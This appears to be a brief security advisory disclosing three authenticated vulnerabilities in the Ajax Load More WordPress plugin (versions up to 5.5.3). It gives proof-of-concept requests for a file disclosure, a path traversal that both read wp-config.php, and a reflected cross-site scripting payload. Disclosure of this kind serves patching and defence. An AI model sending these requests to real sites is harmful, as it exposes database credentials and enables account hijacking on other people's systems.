Ajax Load More <= 5.5.3 Multiple Vulnerabilities
Authenticated Information Disclosure / Local File Disclosure:
"ajax-load-more-repeaters" AJAX action is vulnerable to "Full Path Disclosure" since full path of webserver file name can be seen in the request. Arbitrary filename can be provided as input via parameter "alm_repeaters_export" to view the file contents. PoC for reading WordPress Configuration file:
POST /wp-admin/admin.php?page=ajax-load-more-repeaters
alm_repeaters_export=/var/www/html/wp-config.php
Vulnerable file: admin/admin.php
Authenticated Cross-Site Scripting:
PoC:
/wp-admin/admin-ajax.php?action=alm_get_tax_terms&taxonomy=post_tag&index=1"><script>alert(1)</script>&nonce={nonce}Parameter index is not properly sanitized.
Vulnerable file: admin/admin.php

Authenticated Path traversal to arbitrary file read:
PoC:
/wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=./../../../../wp-config.php&custom=true&alias=&nonce={nonce}
/wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=./../../wp-config&alias=&nonce={nonce}Vulnerable file: admin/admin.php
